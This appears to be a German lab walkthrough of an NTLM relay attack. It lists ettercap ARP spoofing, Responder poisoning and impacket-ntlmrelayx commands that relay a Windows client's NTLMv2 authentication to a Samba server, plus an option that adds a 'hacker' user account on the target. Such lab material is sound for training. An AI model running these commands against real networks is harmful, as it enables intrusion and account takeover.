NTLM-Relay auf Samba-Freigabe mit Impacket
ARP-Spoofing & NTLMv2-Relay gegen SMB-Zielserver
Zielsetzung
Ein Windows-10-Client (10.0.10.102) wird per ARP-Spoofing in einen Man-in-the-Middle gebracht. Anschließend wird mittels LLMNR/NBNS-Spoofing durch Responder ein NTLMv2-Hash abgefangen und mit ntlmrelayx an einen Samba-Server (10.0.10.104) weitergeleitet, um dort eine Datei hochzuladen.
Umgebung
| System | IP-Adresse | Rolle |
|---|---|---|
| Kali Linux | 10.0.10.101 | Angreifer (ettercap, responder, ntlmrelayx) |
| Windows 10 | 10.0.10.102 | Opfer (NTLM-fähig, ungehärtet) |
| Samba-Server | 10.0.10.104 | Relay-Ziel (kein SMB Signing aktiviert) |
Vorbereitung auf Kali (10.0.10.101)
- Relay-Share vorbereiten:
mkdir -p ~/relay-share echo "Owned by Kali" > ~/relay-share/pwned.txt
- Responder konfigurieren:
nano /etc/responder/Responder.conf
- Abschnitt [SMB] ändern:
[SMB] SMB = Off
- Damit Responder nicht selbst den SMB-Port (445) blockiert – sonst funktioniert ntlmrelayx nicht!
Angriffsdurchführung auf Kali (10.0.10.101)
ARP-Spoofing zwischen Opfer und Zielserver
ettercap -Tq -i eth0 -M arp /10.0.10.102// /10.0.10.104//
Responder starten (nur als Spoofer)
responder -I eth0 -w
ntlmrelayx starten
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support --no-http-server --no-wcf-server --no-raw-server -r relay-share
Aktion auf dem Windows-Client (10.0.10.102)
- Windows Explorer öffnen und folgendes eingeben:
\\irgendwas\test
ODER:
- In der Eingabeaufforderung:
dir \\irgendeinserver\c$
Ergebnis
- Die Datei „pwned.txt“ wird über ntlmrelayx auf dem Samba-Share (10.0.10.104) abgelegt.
- In ntlmrelayx erscheint:
[*] SMB relay attack successful... [*] Uploaded file pwned.txt to share
Hinweise
- Kein IP-Forwarding notwendig – Ettercap leitet Layer 2 Pakete direkt weiter.
- SMB muss in Responder deaktiviert werden, sonst blockiert er Port 445.
- ntlmrelayx kann alternativ Kommandos ausführen:
--command "net user hacker 1234 /add" --command "cmd.exe /c echo PWNED > C:\pwned.txt"